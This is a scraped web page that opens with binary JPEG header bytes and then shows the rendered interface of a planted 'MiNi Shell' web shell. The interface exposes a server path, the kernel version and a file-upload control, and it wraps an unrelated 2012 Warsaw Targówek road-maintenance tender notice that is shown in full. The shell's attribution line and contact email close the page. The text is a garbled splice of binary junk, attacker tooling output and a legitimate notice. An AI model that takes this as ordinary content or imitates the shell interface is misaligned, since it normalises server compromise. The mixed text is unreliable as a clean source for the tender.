JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121012/217759-N-2012.html

<p class="kh_header"><b>Warszawa: Bieżące utrzymanie i remonty cząstkowe dróg gminnych o nawierzchniach jezdni:
- rozbieralnych wraz z chodnikami i oznakowaniem pionowym i poziomym,
- tłuczniowych i gruntowych wraz z budową i czyszczeniem studni chłonnych,
na drogach będących w zarządzie m.st. Warszawy Dzielnicy Targówek.</b><br>
<b>Numer ogłoszenia: 217759 - 2012; data zamieszczenia: 12.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Targówek , ul. Ludwika Kondratowicza 20, 00-983 Warszawa, woj. mazowieckie, tel. 22 4438701, 22 4438696, faks 22 675 18 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.targowek.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie i remonty cząstkowe dróg gminnych o nawierzchniach jezdni:
- rozbieralnych wraz z chodnikami i oznakowaniem pionowym i poziomym,
- tłuczniowych i gruntowych wraz z budową i czyszczeniem studni chłonnych,
na drogach będących w zarządzie m.st. Warszawy Dzielnicy Targówek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac do wykonania w ramach przedmiotu zamówienia obejmuje:
2.1. ROBOTY ROZBIÓRKOWE  
1)	rozebranie krawężników wraz z ławą podkrawężnikową oraz obrzeży,
2)	rozebranie istniejącej nawierzchni: z płyt chodnikowych betonowych                     o wymiarach 35x35x5 cm lub 50x50x7 cm, płyt betonowych drogowych sześciokątnych (trylinki), nawierzchni z asfaltu lanego itp.,
3)	usunięcie podsypki piaskowej lub cementowo-piaskowej,
4)	rozebranie podbudowy betonowej, z kruszywa łamanego lub naturalnego                         i usunięciu warstwy odsączającej, pogłębieniu, wyprofilowaniu i zagęszczeniu koryta,
5)	ułożenie z rozbiórki danego fragmentu nawierzchni (jeżeli nadaje się 
do ponownego wbudowania).
2.2. ROBOTY ZIEMNE  
1)	wykonywanie robót ziemnych wykonywane koparkami podsiębiernymi,
2)	mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni. 
2.3. TRANSPORT GRUZU I MATERIAŁÓW Z ODZYSKU 
1)	wywiezienie gruzu spryzmowanego samochodami samowyładowczymi - określa wykonawca jako element przetargu,
2)	transport materiałów sztukowych o masie do 50 kg pojazdami skrzyniowymi z załadunkiem i wyładunkiem ręcznym. Transport materiałów z odzysku z budowy do magazynu lub z magazynu na budowę - określa wykonawca jako element przetargu
2.4. ROBOTY W ZAKRESIE PRZYGOTOWANIA TERENU POD BUDOWĘ 
I ROBOTY ZIEMNE  
1)	oczyszczenie terenu z pozostałości po wykarczowaniu (drobne gałęzie, korzenie i kora bez wrzosu) z wywiezieniem,
2)	roboty ziemne wykonywane koparkami podsiębiernymi,
3)	mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni.
2.5. PODBUDOWA  
1)	mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, 
2)	ułożenie nowej warstwy odsączającej i podbudowy z kruszywa łamanego 
lub naturalnego, jeżeli uprzednio zostały rozebrane,
3)	ułożenie podsypki piaskowej lub pospółki z zagęszczeniem mechanicznym 
- 10 cm grubość warstwy po zagęszczeniu, 
4)	ułożenie podsypki cementowo-piaskowej z zagęszczeniem mechanicznym 
- 5 cm grubość warstwy po zagęszczeniu.
2.6. PODBUDOWY - NAWIERZCHNIE NIEULEPSZONE  
1)	ułożenie nawierzchni z tłucznia kamiennego (materiał kwarcytowy) - warstwa dolna z tłucznia - grubość po zagęszczeniu 10 cm, 
2)	wypełnienie tłuczniem (materiał kwarcytowy) rowów odwadniających bez zagęszczania mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, 
3)	wykonanie remontu nawierzchni z tłucznia kamiennego (materiał kwarcytowy) - warstwa górna z tłucznia - grubość po zagęszczeniu 7 cm,
4)	wykonanie remontu cząstkowego nawierzchni tłuczniowej (materiał kwarcytowy) - mechaniczne zagęszczenie tłucznia - głębokość wyboi do 5 cm, 
5)	profilowanie z wałowaniem nawierzchni gruntowych i tłuczniowych,
6)	profilowanie z wałowaniem nawierzchni gruntowych i tłuczniowych z wodą.
2.7. NAWIERZCHNIA  
1)	wykonanie nawierzchni z betonowej kostki brukowej grubości 8 cm koloru szarego oraz koloru czerwonego na zjazdach i zatokach postojowych, na podsypce piaskowej lub cementowo-piaskowej,
2)	wykonanie nawierzchni z płyt drogowych betonowych sześciokątnych o grub.          15 cm z wypełnieniem spoin zaprawą. Wbudowanie materiału z odzysku, znajdującego się w magazynie,
3)	wykonanie nawierzchni z kostki kamiennej rzędowej o wys. 16 cm na podsypce żwirowej nowej. Wbudowanie materiału z odzysku, znajdującego się 
w magazynie.
 - nie stosować materiałów wapiennych z dużą ilością frakcji ilasto-pylastych

2.8. ŁAWY I KRAWĘŻNIKI  
1)	wykonanie rowków pod krawężniki i ławy krawężnikowe o wym. 30x30 cm 
lub 30x40 cm,
2)	wykonanie ławy pod krawężniki betonowe z oporem,
3)	ustawienie nowych krawężników na ławie oraz obrzeży,
4)	krawężniki i obrzeża - wbudowanie materiału z odzysku, znajdującego się
w magazynie. 
2.9. CHODNIKI  
1)	wykonanie nawierzchni z betonowej kostki brukowej grubości 6 cm koloru szarego,
2)	wykonanie chodników z płyt betonowych 35x35x5 cm na podsypce piaskowej 
z wypełnieniem spoin zaprawą cementową. Wbudowanie materiału z odzysku, znajdującego się w magazynie,
3)	wykonanie chodników z płyt betonowych 50x50x7 cm na podsypce piaskowej 
z wypełnienie. spoin zaprawą cementową. Wbudowanie materiału z odzysku, znajdującego się w magazynie.
2.10. ROBOTY ODWADNIAJĄCE - STUDNIE CHŁONNE BUDOWA
I CZYSZCZENIE 
1)	ręczne roboty ziemne z transportem urobku samochodami samowyładowczymi, 
2)	wykonanie studzienek ściekowych z gotowych elementów betonowe o śr. 500 mm bez osadnika i bez syfonu,
3)	wykonanie kanałów rurowych - podłoża z materiałów sypkich o grubości 10 cm,
4)	wykonanie pełnego umocnienia pionowych ścian wykopów liniowych o głębok. do 3,0 m wypraskami w gruntach suchych,
5)	wykonanie drenażu - podsypka filtracyjna ze żwiru lub pospółki w gotowym suchym wykopie z gotowego kruszywa pod studnią chłonną,
6)	ułożenie pokryw nadstudziennych żelbetowych z pierścieniem odciążającym i włazem dla kominów o śr. 120 cm,
7)	zasypywanie wykopów liniowych o ścianach pionowych głębokości do 3 m, szerokość 0,8-1,5 m,
8)	zagęszczenie nasypów ubijakami mechanicznymi; grunty sypkie 
szer. 0,8 - 1,5 m,
9)	ręczne czyszczenie studzienek rewizyjnych o średnicy wewnętrznej 
1200-1400  mm - grubości osadów do 30 cm,
10)	mechaniczne czyszczenie studzienek rewizyjnych o średnicy wewnętrznej  1400 mm - grubości osadów do 30 cm,
11)	mechaniczne czyszczenie studzienek ściekowych.
12)	wymiana złoża filtracyjnego studni
2.11. REGULACJA PIONOWA STUDZIENEK KANALIZACYJNYCH 
 1)	montaż pokryw włazów kanałowych,
2)	regulacja pionowa studzienek dla włazów kanałowych,
2.12. REGULACJA ZAWORÓW GAZOWYCH  
1)	regulacja pionowa studzienek dla zaworów gazowych.
2.13. REGULACJA ZAWORÓW WODOCIĄGOWYCH  
1)	regulacja pionowa studzienek dla zaworów wodociągowych.

2.14. REGULACJA STUDZIENEK TELEFONICZNYCH  
1)	regulacja pionowa studzienek dla studzienek telefonicznych.
2.15. ZIELEŃ DROGOWA  
1)	ręczne rozrzucenie ziemi żyznej lub kompostowej na skarpach o nachyleniu 
do 1:2 grubość warstwy 2 cm.
2.16. ROBOTY W ZAKRESIE ORGANIZACJI RUCHU  
1)	ustawianie nowych znaków drogowych,
2)	uzupełnianie zniszczonych i skradzionych znaków drogowych wraz ze słupkami,
3)	usuwanie lub przenoszenie znaków istniejących,
4)	odnawianie istniejącego oznakowania poziomego,
5)	nanoszenie nowego oznakowania poziomego,
6)	umieszczanie i uzupełnianie brakujących punktowych elementów odblaskowych (kocich oczek),
7)	umieszczanie, uzupełnianie i odnawianie urządzeń bezpieczeństwa ruchu, w tym wygrodzeń i progów zwalniających.
2.17. RENOWACJA OBIEKTÓW MOSTOWYCH  
1) zabezpieczenie antykorozyjne poręczy i elementów nośnych konstrukcji,
2) malowanie poręczy i elementów nośnych konstrukcji,
3) naprawa nawierzchni na obiektach mostowych.
2.18. USŁUGI ZWIĄZANE Z PROWADZENIEM MAGAZYNU
1)	prowadzeniem magazynu materiałów z odzysku powierzonych przez  zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.	Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy.
2.	Wielkość zamówień uzupełniających stanowić będzie nie więcej niż 50 % wartości zamówienia podstawowego i będzie polegać na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.12.20-6, 45.11.12.00-0, 45.23.33.30-1, 45.23.32.52-0, 45.23.32.22-1, 45.23.24.52-5, 45.23.24.10-9, 45.23.12.23-4, 45.23.21.00-3, 45.23.23.32-8, 45.11.27.10-5, 45.23.31.50-5, 45.22.11.19-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca składający ofertę zobowiązany jest do wniesienia wadium w wysokości 12 000,- zł (słownie: dwanaście tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia wyrażającego się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 
a) jednym zamówieniem, którego przedmiotem było - bieżące utrzymanie i remonty cząstkowe nawierzchni jezdni, budowa, przebudowa, remont lub modernizacja dróg o nawierzchni rozbieralnej co najmniej kategorii gminnej o wartości brutto nie mniejszej niż 200 000,00 zł, (słownie: dwieście  tysięcy złotych), oraz
b)jednym zamówieniem, którego przedmiotem było - bieżące utrzymanie i remonty cząstkowe nawierzchni jezdni, budowa, przebudowa, remont lub modernizacja dróg o nawierzchni tłuczniowej lub budowa podbudów tłuczniowych dróg co najmniej kategorii gminnej o nawierzchni jezdni z mieszanek mineralno - bitumicznych lub betonowych o wartości brutto nie mniejszej niż 200 000,00 zł, (słownie: dwieście tysięcy złotych).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ww. warunek  powinien spełniać co najmniej jeden z tych Wykonawców albo wszyscy Wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ww. warunek  powinien spełniać co najmniej jeden z tych Wykonawców albo wszyscy Wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają na rachunku bankowym środki finansowe lub zdolność kredytową na łączną kwotę nie mniejszą niż 300 000 zł (słownie: trzysta tysięcy złotych).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ww. warunek  powinien spełniać co najmniej jeden z tych Wykonawców albo wszyscy Wykonawcy wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- ofertę, zgodną w treści z formularzem ofertowym stanowiącym załącznik nr 1 do SIWZ, - kosztorys ofertowy opracowany metodą szczegółową, o którym mowa 
w Dziale XII ust. 1 pkt 2 SIWZ - wg zał. nr 8 do SIWZ,
- wykaz części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom   z podaniem jej zakresu rzeczowego wg kosztorysów ofertowych - załącznik nr 7 do SIWZ. W przypadku osobistego wykonywania przedmiotu zamówienia, załączenie do oferty ww. załącznika nie jest wymagane.
- pisemne zobowiązaniem innych podmiotów do oddania Wykonawcy 
do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, o którym mowa w Dziale VI ust. 1 pkt. 5. W przypadku nie wskazania innych podmiotów, załączenie do oferty ww. załącznika nie jest wymagane.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość dokonania zmian  zawartej umowy na warunkach określonych we wzorze umowy stanowiącym załącznik nr 6 do SIWZ w przypadku zmian podwykonawców u Wykonawcy dokonanych za zgodą Zamawiającego - pod warunkiem, że zmiana wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy z zastrzeżeniem, że jeśli Wykonawca w procedurze udzielenia niniejszego zamówienia posłużył się doświadczeniem podwykonawcy, nowy podwykonawca musi również wykazać się doświadczeniem wymaganym przez Zamawiającego w procedurze
o udzielenie zamówienia będącego przedmiotem umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.targowek.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd m.st. Warszawy dla Dzielnicy Targówek, 00-983 Warszawa, ul. Kondratowicza 20, pok. 202 piętro II. Opłata za dok. przetargowe 30 zł płatne w kasie urzędu, w banku lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2012 godzina 09:30, miejsce: w siedzibie Urzędu m.st. Warszawy dla Dzielnicy Targówek przy ulicy Kondratowicza 20 w Warszawie, w Wydziale Obsługi Mieszkańców - biuro podawcze (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com